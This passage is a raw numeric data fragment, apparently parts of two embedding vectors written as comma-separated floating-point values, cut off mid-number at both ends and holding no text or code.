56154905,-0.008798157,0.006966301,0.021931954,0.023932356,-0.004298235,-0.013962876,-0.01825927,-0.021560134,0.014977546,0.03142015,0.00940981,-0.0009899233,-0.018722422,0.019497832,0.024317417,-0.0031198882,0.019880513,0.0028516508,-0.0053038667,-0.018652963,0.0053711324,0.0032081755,-0.0000922262,-0.0069185807,-0.007845106,0.00727211,0.00009202239,-0.018456303,0.012917875,-0.0060339696,-0.0028168496,-0.011224299,0.0075203064,0.013123424,-0.014331834,0.036188785,-0.0030289355,0.005316726,-0.0048224367,-0.01174035,-0.0040483326,0.015474276,-0.0018132363,-0.0024035804,0.022495138,-0.036038082,0.012651548,0.007881888,0.015857678,0.007230588,-0.025642926,-0.016538844,0.007129003,0.0014549787,-0.010465718,-0.03578455,0.0108770365,0.012334297,-0.01918472,-0.010388138,-0.008620683,0.00017735745,-0.011105435,-0.00096037274,-0.012666401,0.036640696,0.0077993795,-0.007555635,0.012444881,-0.007917918,0.004184971,-0.020065814,-0.0184545,0.010304802,-0.007617916,0.05136772,-0.021888625,-0.0031285721,0.009726537,0.03230235,0.023060717,-0.01060636,-0.0014684653,-0.00066127937,-0.038597323,-0.008251425,-0.029038196,-0.0169746,-0.00585536,-0.025335794,-0.02323755,0.008971829,0.00029679254,-0.010591519,0.004723543,0.022114923,-0.017298218,0.0383514,0.0064002974,-0.0018117281,-0.03895854,-0.012007373,0.010922564,-0.024697917,0.0097369915,0.014498602,-0.016398033,-0.024115767,-0.004283712,-0.02682317,-0.010156102,0.006364512,-0.013686706,0.0034266792,0.0074230963,0.033835314,0.010238737,0.0012751796,0.02182198,0.006851783,-0.02527115,-0.0072347894,0.008396331,-0.028900834,-0.0030157708,-0.010195963,-0.0010402999,0.019830056,0.007267256,-0.023512824,0.02556773,0.0058856546,-0.002832516,-0.011429202,-0.001183882,0.027431482,-0.012957507,-0.023067782,-0.009597302,0.018579176,0.012620064,-0.0253287,-0.02468975,0.006191996,-0.011471862,-0.0016382111,0.006146008,0.0062141377,0.004157834,0.009985993,-0.016700326,0.0105391815,-0.0021529326,-0.03105562,0.029029483,0.0029396096,0.019745952,0.006509951,-0.008342252,0.018278413,0.017015535,-0.018793747,-0.0030894766,0.0046584588,0.006952867,0.035652135,-0.00008471528,0.025713474,0.00017306705,-0.011104648,0.002314232,-0.0077949585,-0.02609318,0.0076641957,-0.022859601,-0.021767924,-0.0032763127,-0.0154290395,-0.012725674,-0.0073384503,0.011171699,-0.15524445,0.007977508,-0.009569536,-0.028470732,-0.0075909984,-0.005945727,0.007862921,0.011391621,-0.006735774,-0.03846581,-0.0070035113,0.022951609,0.0072630243,-0.0035980102,-0.0102679925,0.00037793643,-0.026298791,-0.010064352,-0.0059151547,0.021676784,0.023494897,-0.013685605,-0.008920745,0.0055111926,-0.004149468,0.003988542,-0.0050163665,0.010187719,0.00623495,0.019757032,0.010052243,0.019468812,-0.0040028985,0.016238168,0.005309501,0.005523376,0.0039056216,0.015211145,-0.00026263684,0.0053379275,-0.0061547295,0.013145795,0.014907674,-0.0053607426,0.0038882499,0.0012444988,0.0019607707,0.017646989,0.019963354,0.010540335,-0.016114205,-0.0010967787,0.006956579,-0.010084385,-0.019327912,-0.008167126,-0.0019571662,-0.002399978,0.017928677,0.013633113,-0.019762715,-0.0051255436,0.0022937555,-0.0017451906,0.0041909935,0.0029710392,0.010902505,0.013238177,-0.024379868,-0.0063012964,0.005182,0.018973006,-0.0050922763,0.006501924,-0.0033201308,0.009884019,0.0047512157,-0.005903717,-0.020739555,0.03219538,-0.038766682,-0.004138541,0.00091718574,0.024952458,-0.0015953408,-0.015847843,0.012048073,0.028774021,-0.013327802,0.016386367,0.011078393,0.009081788,-0.0042388723,-0.020549348,-0.014029082,0.010881604,-0.017891835,0.0069389176,0.015221603,-0.013111578,-0.0039554583,0.009742079,0.0037392746,-0.029570341,-0.13184479,-0.022080489,0.018889813,-0.010077208,0.004358211,-0.017861892,0.013855606,0.0052063805,0.037403993,0.0052407607,-0.007616647,0.023168871,0.004347127,-0.0037385998,-0.0018499038,0.015709799,-0.02801173,0.0037110704,-0.0048196986,-0.0009792767,-0.0017885602,-0.016482988,0.0020737764,0.0070154364,-0.0030451822,-0.00010782667,0.017617619,0.03670037,0.023976091,-0.005512506,-0.005481233,0.0069946675,0.0043043983,-0.008822889,-0.04923564,-0.0073347474,0.019841082,-0.013924472,-0.003277948,0.027170725,0.0076227724,-0.0034787648,0.01363419,0.015800452,0.0032292746,-0.016426932,0.015820526,0.031812396,-0.016854323,-0.022929033,-0.0043828804,0.0016439563,-0.0058021434,-0.0034939419,-0.011022875,-0.0025694047,-0.0031944015,0.0015101879,0.017916458,0.0059791896,-0.007465792,0.022331754,-0.0038626718,0.014907585,0.0031987028,0.0023708355,-0.010363545,0.00819884,-0.0037305504,0.011050094,-0.0035691252,0.025033263,-0.00017002563,-0.013159027,0.02042154,-0.0074896794,0.004248311,0.025014428,0.018054672,-0.009956427,0.014625118,-0.019976545,-0.005291146,0.020159291,-0.04350848,0.017500281,0.009065661,-0.016452875,-0.029659636,0.017912686,0.021648278,0.022516513,0.006875942,0.02439735,0.015073539,-0.009584483,0.05962154,-0.001739001,-0.01090101,-0.019407054,-0.0013157171,-0.012980817,-0.013029806,-0.0008707253,-0.015893282,0.0067234747,0.032386962,-0.0004930512,0.009512791,-0.0029863827,0.0023650334,0.029829564,-0.024803014,0.00074681983,0.015946086,0.0039029794,-0.0093256375,-0.003570191,-0.0074840738,-0.00093314954,-0.0062986626,0.016773297,0.0070588756,-0.020524267,0.007269257,-0.0018969686,-0.013961204,0.019257326,0.009544622,-0.012554417,0.0048563224,0.008239979,0.0072352737,-0.009814166,-0.0012685786,0.02006595,-0.00870146,-0.0010209191,-0.0059054065,-0.019518752,0.0041812165,-0.010462615,-0.004995079,-0.0012708015,-0.012301568,0.0016203979,-0.014373505,-0.0050099073,-0.023302825,0.010617613,0.0024008953,-0.016106479,0.01669249,0.030238852,0.0022436348,0.005768549,-0.015531782,0.0017459665,-0.0058631487,0.007731051,-0.008885884,0.010370717,0.020425802,-0.01512367,-0.016606899,0.0016658229,-0.014649332,0.0050818026,0.010858699,0.02283897,-0.0025905047,0.007954685,0.018543422,-0.056574233,0.008831951,0.013226422,0.0032154925,0.0142079815,0.04139,0.013762217,-0.0095956605,0.006338611,-0.013848254,0.0014332683,0.012661281,0.013297249,0.020532485,-0.014445073,-0.017929109,-0.013744663,0.023210345,0.0046620606,-0.012621981,-0.019060154,0.010760287,0.009090065,0.0030724425,0.021578053,-0.0053587174,-0.009174357,-0.02409605,0.0039222944,-0.0105652055,-0.0055031846,0.0071702786,0.014134509,0.0051227855,0.03199787,0.0050063427,-0.012963165,-0.0036916817,-0.0008689626,-0.005699202,0.0036827726,0.007272214,0.002983284,-0.015135543,-0.013923469,0.01649454,-0.0066102813,-0.010719746,-0.027914595,0.0075174444,-0.0070386482,-0.009308166,0.026763346,0.028326584,0.026163055,-0.032157242,-0.01325071,0.016780974,0.0004131745,-0.025076514,0.0057974877,-0.013407209,-0.025094284,0.027208932,0.012869778,0.0063921036,0.0008457493,0.019675517,0.014938796,0.026881304,0.0032239782,0.021571662,-0.006595943,0.012830655,-0.00046884836,-0.0042893277,0.024880046,0.013258065,0.008495863,-0.01294853,0.0005283101,-0.007882595,0.0064014103,0.020428855,0.016695384,-0.017021893,0.0035006711,-0.028975539,0.009320357,-0.017433293,-0.023856482,0.0056668604,-0.012791822,-0.008099323,-0.022036623,0.0018939388,-0.006606403,0.02169376,-0.0027819711,-0.013561687,0.015389779,-0.013209332,-0.0012637874,0.0047499673,-0.0045317602,0.018651359,0.0050781844,-0.004432492,0.015056504,-0.011945827,0.032801334,-0.005238268,0.0014148281,0.0034082185,0.015896933,-0.00094105414,-0.011478847,0.02981085,-0.00482345,-0.0009679838,-0.017225081,0.010401709,0.009553024,0.02073622,-0.015646253,-0.0021948225,0.0173982,0.00674942,-0.044391993,-0.020903986,-0.02439171,-0.0024763958,-0.0084944805,-0.011363027,0.011514457,0.0069960235,0.0079446435,-0.03394579,0.008578451,0.0031113098,-0.00737464,0.0028868322,-0.003657849,0.00039373286,0.0068513956,-0.04104817,-0.022661751,-0.00070765393,-0.009326259,0.02805619,-0.003673944,0.006562984,-0.00856094,0.0018147803,0.028748158,-0.0024772123,0.0003400931,0.0014896241,-0.031627215,-0.020422311,0.0012508347,0.026312772,0.0035074025,0.020158725,0.037655972,-0.0190379,0.023603683,0.00006078916,0.016817153,-0.009498062,0.00029835495,0.019458262,0.005460133,0.0038186817,0.017726142,-0.018073851,0.0053252284,0.013530395,0.004033523,-0.007136795,-0.0056064865,-0.03195167,0.021438442,-0.02829356,-0.0048362296,0.013921127,-0.0014375749,-0.010202216,-0.013012347,-0.020790592,-0.013902965,0.007424195,-0.01885083,-0.01805289,0.0094890185,-0.016296653,-0.008428679,-0.0005331684,0.024023164,-0.017605737,-0.02438683,-0.009605069,-0.099073894,-0.009224549,0.024435764,0.004478113,0.03382424,-0.0028601203,-0.004806095,-0.025057683,-0.011193157,0.012654903,-0.008525071,-0.0075941356,-0.014580844,0.0026477156,0.033753697,-0.027594972,-0.025519412,0.0006366057,0.010759256,-0.037832253,-0.0010941552,0.003536366,0.0016470562,-0.010095408,0.01637448,0.0056163077,-0.005811482,-0.0138786035,-0.0027190016,0.0022822514,-0.007673492,-0.005127315,-0.0036689786,-0.015229148,-0.0055130674,0.00872223,-0.026623573,0.020062601,-0.027093006,-0.020729229,-0.0011572995,0.00057675096,-0.0052574,0.0013439642,-0.018953163,0.014306354,-0.008349703,-0.000716611,-0.00031514224,0.0039004707,-0.015693154,0.0035041773,-0.0017422474,0.020124886,-0.00045197183,0.0034062595,0.0027182864,0.0000535281,0.02714433,0.0057272715,-0.024763804,0.0015130971,0.004906981,-0.0049283337,0.006182011,-0.008842526,0.009425446,0.014564917,-0.016877519,0.015847413,0.0027396006,-0.03812567,0.004586437,-0.00731961,-0.0026029602,-0.0032611035,0.029548647,-0.019082705,-0.015980233,0.008257503,0.02150529,0.0091518685,0.01942236,-0.0028517111,0.022741906,0.0073628514,0.0019983188,-0.0028507437,0.0031080819,-0.0016610561,-0.025420398,-0.0059922487,0.018768271,0.0005106637,0.0116590485,0.0050700367,-0.028063811,0.0047486406,-0.008505884,0.0016149696,0.0017188849,-0.002616232,-0.009863684,-0.009834024,0.012573832,0.0013793919,0.0020862105,-0.0037425521,-0.0033077498,-0.018234456,-0.012437479,0.01448025,0.010393764,0.025925439,0.010641861,0.020262403,-0.002171793,0.027788604,-0.015361792,-0.03422067,-0.0067280354,-0.011162551,-0.019934185,0.034887996,0.0172226,0.0024427434,0.0029883746,0.005614529,-0.020051401,0.00063074334,0.005531563,0.01884431,0.016624443,0.004776703,-0.01861951,0.014087909,-0.008394838,0.023877988,0.014779011,0.023973756,0.01052309,0.0027756346,-0.011269835,0.004563027,-0.031979505,0.022167927,-0.007861996,0.004963167,-0.0037366317,-0.032741394,-0.0072241696,0.0003076666,-0.0155065395,-0.008614013,0.012552714,0.012029221,0.0033850223,0.0019516723,-0.02644331,0.010109106,0.000834254,0.021785188,-0.010044817,0.002641489,-0.019527711,0.02993826,0.007885174,0.010122434,0.0071783387,-0.0004919668,-0.016569404,-0.0083490545,0.007935494,0.0034033114,-0.009594348,-0.014090822,0.015662795,0.017474577,-0.01400407,-0.009226584,-0.027335871,0.0057012523,-0.013219543,-0.010184742,-0.011625059,-0.013433919,-0.0072093373,-0.017713228,0.0067403037,-0.0013197307,-0.008540735,-0.006736816,-0.012794581,-0.012486941,-0.009673136,-0.018016301,0.012799166,0.012440244,-0.0057187313,0.0020343356,-0.009859174,0.0036500015,-0.017174719,0.014134719,0.035928566,-0.0025677357,-0.010253508,0.023518877,-0.015614081,0.012378353,-0.009185442,0.017535599,0.0032815738,0.13687442,0.004752208,-0.002642508,-0.0040990156,0.004874543,-0.013848743,0.021021146,-0.0044349553,-0.0035063298,0.008843461,0.014999349,-0.018188177,0.015628867,-0.0014408891,0.008477525,0.025621602,0.0065157246,-0.015027526,0.009275787,-0.0013339745,0.02119524,-0.047371913,-0.011585159,-0.029897483,-0.012803495,-0.061069433,0.013112929,0.019449541,0.007973228,0.030407287,0.013685756,-0.01935046,0.0037473335,0.01769956,-0.0155786015,0.013089657,0.008568341,-0.017785722,0.006745558,-0.015134626,0.03005584,-0.00087788847,0.003679679,-0.012769226,-0.0127722025,-0.022979734,-0.012526405,-0.003364006,-0.009255262,-0.0058346265,0.0046210466,0.001519524,0.009295229,-0.012074083,0.0011758205,-0.01829883,0.009279136,0.012018053,0.0038909668,-0.0016092348,0.0094507765,0.0009231037,-0.00018177117,-0.009227324,0.015892794,0.009697627,0.00007235821,0.01041039,-0.012253851,0.0032985685,0.007186954,-0.005040347,0.0089565795,-0.011990209,-0.0034812486,0.008593636,-0.0034917605,-0.01702422,0.0092354845,-0.00012052313,-0.009747543,-0.022389855,0.0048302966,-0.00967287,0.0028543815,0.009686981,-0.0035988828,0.010811457,-0.008287604,-0.020713864,-0.021619847,0.02038015,0.026236085,-0.00040241526,-0.0168635,0.0006596603,0.0053622182,-0.001574813,-0.014409612,0.004772687,-0.031136775,-0.0070432113,0.01253167,0.011364559,-0.00054475333,-0.018765522,0.0035988502,0.00014599005,-0.0063378755,0.006753254,0.007603476,0.030920384,-0.005776382,-0.0015846229,0.000045062145,0.032267585,-0.044250585,-0.009373446,0.016796358,-0.028347189,-0.00034816828,0.021736223,0.009963702,0.02197674,0.00847294,0.0020672802,-0.0039188555,-0.008021123,-0.003473669,0.006365101,0.0130060315,-0.035793748,0.004776516,0.028101232,-0.0025996172,-0.0024776498,0.024793202,-0.015057534,0.01631214,0.004886962,-0.0038744165,-0.014641827,-0.009652574,-0.0033557706,0.013466163,-0.024356505,0.029222999,-0.019571805,-0.0093290545,-0.0004215194,0.013861027,-0.0030103605,-0.020302393,0.00028876928,-0.0210099,-0.016914066,-0.01606755,0.018707039,-0.023121972,-0.0153895775,0.014860261,-0.003196181,0.010521187,-0.045331895,0.020685146,0.017307129,0.00012543803,0.0058768634,-0.012672092,0.00058491644,-0.0068066283,0.0037393607,-0.00471994,-0.0011152101,-0.022349218,0.0055314065,-0.0002502998,0.016194066,-0.02075367,0.0031102889,0.008653516,0.0064722323,0.010322792,-0.019777957,0.028124325,0.0047250343,0.013730112,-0.0013845277,-0.00582329,0.034671724,0.0015171949,-0.009439419,-0.0060745254,0.021354146,-0.024365222,0.016959442,-0.033398394,0.042810734,-0.017865323,-0.033565775,0.0037645055,0.0056875204,0.010416549,-0.02796256,-0.0011159573,-0.009188545,-0.005100592,-0.008663636,0.00081625493,-0.008117196,-0.001785617,-0.003720677,-0.008601457,-0.045405015,0.007043183,-0.0007917485,0.0006543965,-0.018234834,-0.028021611,-0.011200673,0.0048481748,0.018679399,-0.003227557,-0.0065756673,-0.015005195,0.0064188205,-0.015747758,0.021612711,0.024651326,-0.004511374,-0.014518527,0.018795999,0.021999437,-0.01174463,-0.031345144,0.0063726604,0.03837255,0.0039079944,-0.0045540784,0.025601434,-0.017191142,0.0056191892,0.004149431,0.007285332,-0.01581777,0.020852674,-0.026631467,-0.003865814,0.0011891314,-0.005523016,-0.0429355,-0.002289525,-0.0055870255,-0.01823058,-0.023983767,-0.012851423,0.0023879746,0.023284446,0.0007493653,-0.021940567,0.021388888,0.009855328,-0.009021709,0.022683846,-0.0029195575,0.00002352639,0.014897395,-0.020526133,-0.007479671,0.0072180135,0.0020113534,0.018790567,-0.008396154,0.030514253,0.01620371,0.015546123,0.011198189,-0.0018319217,-0.018257275,-0.029323839,0.023306217,-0.0010881529,-0.02751189,-0.040750317,0.00029291536,0.008199585,-0.0079867905,0.018264785,0.0640815,-0.06537295,0.0037855993,0.015235549,0.014761851,-0.0044910093,0.015927663,0.0044225836,-0.024262827,-0.020671813,0.017472627,0.021566983,-0.0064379987,-0.042131547,-0.0055181854,-0.01590116,-0.0031910297,-0.015837967,0.0044136876,-0.02122644,-0.013531119,0.0020943189,-0.01152255,0.00031345664,0.005482299,-0.009412619,-0.0028131336,-0.02883826,0.018807959,0.00040250705,0.011576389,0.008843681,0.011456354,-0.017916886,0.0086244615,0.007891923,-0.010583455,0.020378157,-0.014873107,-0.028986715,-0.02308369,0.0033549736,-0.002179806,-0.003689791,-0.001570306,-0.008162942,-0.002379987,0.018359108,-0.021306803,0.124087565,-0.017192177,0.005045891,0.016504455,-0.012311451,-0.006180334,0.008339849,0.025082057,-0.008670221,-0.0027033829,0.013133054,-0.002528024,0.016959231,0.017300576,0.003900719,-0.010136673,-0.00068434794,0.11689172,-0.02024227,0.0072358386,-0.0063264663,0.0028345843,-0.005480947,0.0022053483,0.01841792,-0.08228492,0.0053048856,-0.04724546,-0.011805544,0.014375837,-0.03290699,0.02754209,-0.0097711785,-0.011639612,-0.006011014,0.0053342846,0.004236322,0.00067593425,-0.020157482,-0.020562762,-0.0052129063,-0.013080322,-0.017745731,0.005419423,-0.021890128,0.019472467,-0.03338163,0.0024613508,0.010108561,0.011505031,0.005756179,0.0063139554,0.032861166,-0.017771645,0.011094613,0.0073734066,-0.0057967887,-0.006621157,-0.009200036,0.025129596,-0.0023663046,0.016848149,-0.018688874,0.028567113,-0.014090475,-0.0060679675,-0.013853838,-0.0023162267,0.019401811,0.017151605,0.026293287,0.0093009425,-0.009989784,-0.010049232,0.020739993,0.01083718,0.0024254597,0.011722891,0.003912117,-0.01203778,0.02335702,0.009077167,-0.00826997,0.0045897616,0.025594722,0.012623248,0.004158064,-0.009739533,0.03191403,-0.0037304156,0.0075636613,0.012403415,-0.0014740798,0.00896792,0.0106146475,0.033085503,0.006166795,-0.005078616,0.011517751,-0.014805044,-0.009030788,0.021730969,-0.014433577,0.00018288047,-0.021798206,0.002835682,-0.001210728,-0.03292825,0.0046430016,0.005571482,0.0039737276,0.014364449,-0.0066315085,0.019739479,-0.0025614204,-0.006474126,-0.008930192,0.012249742,-0.03317871,-0.0019942932,-0.0036657453,0.000049263985,0.002537634,-0.003726776,-0.020776208,-0.0028396242,0.007048246,0.03637176,-0.012822957,-0.0055651567,-0.015660373,-0.0015162922,0.0067782905,0.06688618,0.014812812,-0.024544047,0.02968484,-0.04450239,-0.027482573,-0.008948965,-0.0117864525,0.010192385,-0.002281938,0.006276909,0.0012929518,-0.010018724,0.0020857153,-0.011771781],[-0.011292713,0.010568824,-0.018366698,-0.019918358,-0.0019936783,-0.035130616,0.0017357186,0.0065515502,-0.004924113,-0.018529795,-0.0021641324,0.042448286,-0.009748572,0.0009954161,-0.030070525,-0.005214825,0.009603171,0.00036795458,0.0019147163,0.01183916,0.01563196,-0.0062861647,0.025527801,-0.009290913,0.017360065,-0.0019086157,0.016088305,-0.0074098133,0.0027798596,0.009659685,-0.006445693,0.016846355,0.021850364,-0.0009204859,0.03263533,0.016370043,-0.013427489,-0.019275121,0.0055520474,-0.0031538014,-0.014473322,0.019107435,-0.005200866,0.0044107176,0.0015441162,0.00906577,-0.016668884,0.019426314,0.0033410229,-0.0018848582,0.013461901,-0.0063792425,-0.021975009,0.017766794,-0.0098090125,0.012414859,-0.009114508,-0.010225837,0.008855806,0.0016460171,-0.0022474695,-0.0014101107,-0.009466091,-0.014185553,0.03311277,-0.0025346016,0.011508312,-0.0019273049,-0.010554034,-0.022098947,-0.006255499,-0.0096335625,0.012174814,0.009298634,0.02284514,0.030519307,-0.0055288593,-0.02076648,-0.0085733095,0.032990176,-0.0068522785,-0.0023427734,-0.0063073193,-0.004646795,0.024832852,0.00637238,-0.019637255,-0.010221962,-0.0010293407,-0.02322818,-0.004851764,0.01485324,0.013928653,0.0062672454,-0.012315698,0.011426454,0.008056314,-0.015949903,-0.011491012,0.0046231057,0.0054428135,-0.022893833,-0.047037706,0.019181062,0.0058425423,-0.02607923,0.0046269596,-0.02809803,0.0063481973,0.006918471,0.0066749696,0.009312267,0.002263084,0.008114355,-0.005740196,-0.0032829933,0.0058216187,0.014401956,0.00202888,0.0076386454,0.0056519853,0.021212814,0.022596069,-0.0063532535,0.0062463456,-0.015081153,-0.011123592,0.008729801,0.0031784568,0.0035756263,0.0022287664,0.017600562,-0.015416036,-0.012820702,0.018183876,-0.0059675365,-0.00776674,-0.016885843,-0.0053453036,-0.036293738,0.008527301,-0.011191124,0.014066803,0.01290396,0.008708557,0.03228867,0.002517059,0.024164923,0.016478917,-0.0034608433,0.014015879,0.0003561958,-0.017012281,-0.014348556,0.019033635,0.020418974,0.009796245,-0.0066656824,-0.033278793,-0.015548738,-0.016147932,0.018115323,0.014554718,-0.01156076,-0.010301817,-0.04469964,-0.007129721,-0.013991036,-0.022437,0.011264297,0.026486967,0.024754182,0.015286933,-0.0016208463,0.0183873,0.038862314,-0.007500066,-0.025138926,0.00091236486,-0.012028664,0.0070567997,0.01974089,-0.0005682393,-0.0025617618,-0.010712372,0.02474504,0.034779105,-0.020922521,-0.03226769,0.0024394486,0.0393302,-0.009813684,0.00072062196,0.0011569321,-0.024851779,-0.019976279,-0.009483839,0.081261404,-0.0007068627,0.010067953,-0.032510266,0.0056617726,0.0070949155,-0.024658035,-0.0008486515,-0.010044558,-0.010400701,-0.016464744,0.013311089,-0.008312455,-0.0047605177,-0.011573829,-0.036084983,0.016767016,-0.00976804,-0.051680416,0.02654114,0.0060148514,-0.004204328,-0.0053678285,-0.0074622785,0.0056378967,0.029542975,-0.019943353,-0.0064935577,-0.013147839,0.0041021784,0.0032319298,-0.007897916,-0.03104349,0.016663982,0.0071374713,-0.027741285,-0.004541742,0.013981775,-0.012644605,-0.0012959732,-0.027064685,0.00014456951,-0.016695106,-0.01324991,0.0027495348,0.03487884,0.039018765,-0.015211934,0.0054460834,0.015910488,0.010856431,-0.030734433,0.022970857,0.009015435,-0.02035623,0.009996521,0.0074683973,-0.0006079166,-0.010577192,-0.0026085877,-0.0004214056,0.0068247756,0.0073758424,0.037206125,0.028239397,-0.020071056,0.04166107,0.038230848,0.00050285476,0.027853368,-0.04171817,0.0014031554,-0.02385224,-0.02537977,0.006884926,-0.016727006,0.0052233627,-0.000106936626,-0.02061227,0.011089879,-0.00006916331,0.01260094,-0.013453221,-0.0032537081,0.013605375,0.017517671,-0.023370376,0.002865534,0.0013265242,0.014174039,0.009356348,0.035279565,-0.015852721,-0.0018137228,-0.0026843832,0.027793987,0.011669652,-0.01590886,-0.0046627494,-0.037304442,0.023408512,0.0144854095,-0.028981375,-0.007002556,-0.008924978,0.02703063,-0.012264998,-0.02300715,-0.02452005,-0.011799168,0.044141248,-0.012118301,0.028445207,-0.032084722,-0.018323176,-0.021192353,-0.0077420785,-0.000013069889,-0.0024277782,-0.0040260297,-0.025409523,-0.006357084,-0.003538869,0.008409641,-0.0015103922,-0.0028513626,-0.034341674,-0.017819822,0.0037445028,-0.00094591564,-0.0064927507,0.017891215,0.00010427015,-0.019869523,0.013503931,0.024414927,0.017688433,-0.02874553,0.019267457,-0.008480327,0.011397208,0.01728013,0.015185412,-0.026188385,-0.010999225,-0.00041939196,0.014894375,-0.004731068,0.001738555,-0.006464917,-0.0022243808,0.018361727,-0.006058931,0.0155830495,-0.007084649,-0.015904307,-0.01943674,-0.028083531,0.0045540435,-0.010454995,-0.004245331,0.0062066903,-0.017684061,0.021133762,-0.011377009,-0.020262102,0.007343014,0.07086977,-0.004460351,-0.00049556006,-0.0012216439,-0.020619698,0.0004977018,0.02000014,0.019832194,-0.0076429686,0.0060323616,0.005707822,-0.02376746,0.0024066942,0.0068326807,-0.010366841,0.019882603,-0.042467427,-0.00017147372,-0.014131656,-0.00026021895,0.027489137,-0.023740046,0.01211582,0.015775148,-0.0045877835,0.013458166,0.010155501,0.0021545868,0.0029917264,-0.0137640275,-0.010019531,-0.0071474626,0.010285354,0.01159099,-0.04364002,0.010238599,0.017492404,0.0068377643,-0.02030616,-0.0053545567,0.011832153,0.0013092987,0.011768708,-0.024408836,-0.011603522,0.03597471,0.018836495,-0.015189619,-0.007568097,0.02673294,0.006102532,0.024414327,-0.015906405,0.0073635466,-0.008305135,0.023519926,0.008730876,-0.038611997,0.05182475,0.023631144,0.012056896,0.011906418,0.00875173,-0.013367168,0.0051349928,0.033207797,-0.013506071,-0.011063828,0.0046742195,-0.009993696,0.0013211697,0.01125529,-0.010988947,0.014579158,-0.015716337,0.009351085,0.005204376,0.0049242363,0.022156138,0.022131825,-0.0014021653,0.020836009,0.012709514,0.000013002544,0.0021887533,0.0013839877,0.009675395,0.00507665,0.009435621,0.0013095633,0.0073985658,0.019169884,0.008966716,0.015276223,0.020975852,0.01694683,0.01185911,0.02314407,-0.012182202,0.027012011,0.016641555,-0.0016137542,-0.00089867995,-0.016054036,-0.018020822,0.010079978,0.014868422,-0.012247334,0.008373598,0.024746915,-0.021993712,0.0024261305,-0.0029483363,-0.008471898,0.008728102,-0.047139045,-0.0030129545,-0.012509583,-0.00030611368,-0.007008635,0.01563273,-0.0039904956,0.0052951635,0.02965,-0.0060466733,0.0094562955,-0.01007645,-0.005560458,0.0068250173,0.024887858,0.015773058,0.039228845,0.027616953,-0.03943911,0.013677734,-0.018356467,-0.010877575,-0.034341935,0.030133083,-0.0019136653,0.013012406,0.01664315,0.040073644,-0.010908539,0.010978993,0.02136057,0.030259434,0.00036348798,-0.030484589,0.021825245,-0.017857505,-0.004823196,0.009354065,-0.0098087005,-0.010596114,-0.0019488647,0.032306667,-0.023372766,-0.017070126,-0.00014594334,0.027468229,-0.010531489,0.0080069695,-0.0014958031,-0.05112549,0.014349794,-0.004412693,0.05692921,-0.021421935,-0.0143478,0.004039114,0.0048892326,0.000031774107,-0.013587335,0.0037159692,-0.026346026,0.007481323,0.024407007,0.03888906,0.019733416,0.02254339,-0.0103596775,0.0010244272,0.02057546,0.0015813726,-0.014059095,0.0016346083,0.015132411,-0.0060155587,-0.00851235,-0.0023079775,-0.0018930085,0.015741592,0.031401865,-0.0033678806,-0.01594013,-0.011025054,-0.01920781,0.010351809,0.019690404,-0.0037325164,-0.009252015,0.00083661237,0.0022755987,-0.00091202883,-0.025577802,0.033235025,-0.005712162,-0.0076718363,-0.0057204296,0.032091964,0.011086536,-0.013622555,-0.0004632603,0.0058974964,0.017524753,-0.001962649,-0.0046368646,0.021715008,0.015969729,0.027446361,-0.010093344,0.0013304878,0.007994558,0.002935709,-0.0072612846,0.011504126,-0.020773217,-0.014162151,-0.0052133836,-0.011767101,-0.0035818378,0.010662471,0.015069826,-0.018743025,-0.006401982,-0.004664121,-0.0011493865,0.00923989,0.00923053,-0.031476535,0.0144400755,0.0070359847,-0.018368395,0.021764437,0.011125271,-0.012611004,-0.0059496094,0.014176611,-0.0060309675,-0.00066635176,0.0002144366,0.02029603,0.0143756885,-0.01602687,0.006933764,0.00036695763,0.0051682163,-0.015605355,0.016464498,0.0019914643,0.009055969,0.021747258,-0.0059796283,-0.011028449,-0.003063651,0.0212075,-0.036922168,0.006070106,-0.015147777,0.054285843,-0.0152531965,0.006405081,-0.004929157,-0.019098997,0.01044582,-0.021413397,0.043435458,-0.041813564,0.0041402807,-0.0009998656,-0.0003504027,-0.012430121,0.035089616,0.017197622,0.0048331437,0.0010831255,-0.015132528,-0.007003559,-0.004149414,-0.00081152376,0.012276316,0.0067843585,-0.0019481708,-0.024024423,-0.0065808166,-0.030185923,-0.049175177,-0.028431509,0.045440417,0.0028903661,0.01259519,0.007975011,0.0076808147,0.006208473,-0.005422807,0.016794687,-0.05174005,0.0017363261,0.028433187,-0.0190924,0.0070083435,0.003369828,-0.009638378,-0.010755063,-0.023017773,-0.02325862,0.003329417,0.013525155,-0.024640786,-0.004425084,0.012656517,-0.0098561635,0.02415108,-0.039210454,0.015941035,0.011169147,0.056387283,0.03058109,0.000039624392,-0.012228353,0.013922764,0.005927205,0.020089084,0.0040400904,0.025278853,0.01042304,0.0193565,0.012892475,-0.0056692013,0.001376134,-0.023269603,0.004261713,0.03633185,0.025031412,0.004496795,0.03495772,-0.0062548406,0.02262285,0.011810585,0.014196339,-0.0180774,0.025754962,0.018757006,-0.015094574,0.049408462,-0.00858872,-0.005514032,-0.024437832,-0.01983949,-0.022452634,0.026287492,0.02683476,0.005020766,0.025821194,0.0052531883,0.0027842792,-0.0026901574,0.014371188,-0.010164975,-0.002770546,-0.019986948,0.0047383117,-0.007380779,0.0025415386,-0.044608153,0.006208243,0.02266803,-0.01032105,0.015233771,-0.0031789907,-0.013008286,0.0032090435,-0.01529566,-0.05583141,-0.015722444,0.000479287,0.030640915,-0.046673626,0.0031422412,0.021855833,0.01079504,-0.013421794,0.015425435,-0.02797107,-0.009339448,0.009621818,-0.028379332,0.029568769,0.0032836103,0.013802953,-0.003941742,0.014612276,0.00057737355,-0.015939143,-0.013012934,0.0024183658,-0.003505785,0.0054379604,-0.0014613995,0.012364355,-0.016822144,-0.036727227,-0.00874788,0.0013452285,-0.046803813,-0.021557465,-0.0028238518,0.03148041,-0.015272195,0.02639413,-0.021215351,0.014039228,0.018069087,0.0042755827,0.009508099,-0.041399658,-0.007702792,0.04019232,0.0031471972,-0.012963947,-0.02880815,-0.012716615,0.004293535,-0.010981523,0.014627106,0.011846154,-0.019910129,-0.024156563,-0.022573398,0.007138422,-0.027353968,0.0014762621,-0.0008864462,-0.023240464,0.036261603,-0.016596055,0.013725774,0.016902478,0.005225912,-0.0051014908,0.0004009325,0.03145112,-0.027636576,-0.02272045,0.024352524,-0.036320373,0.007091605,-0.0005571799,-0.038302854,-0.025197068,-0.027777722,-0.012454605,-0.013896092,0.02632007,0.0028782836,-0.024109323,-0.024812741,0.025241021,-0.001611313,0.017946932,-0.016561693,-0.01841464,0.012047178,-0.018584324,0.0052273856,0.025889568,-0.03172673,0.015553692,0.016890507,-0.00018169147,0.018473972,0.004643042,0.011889002,-0.013153279,0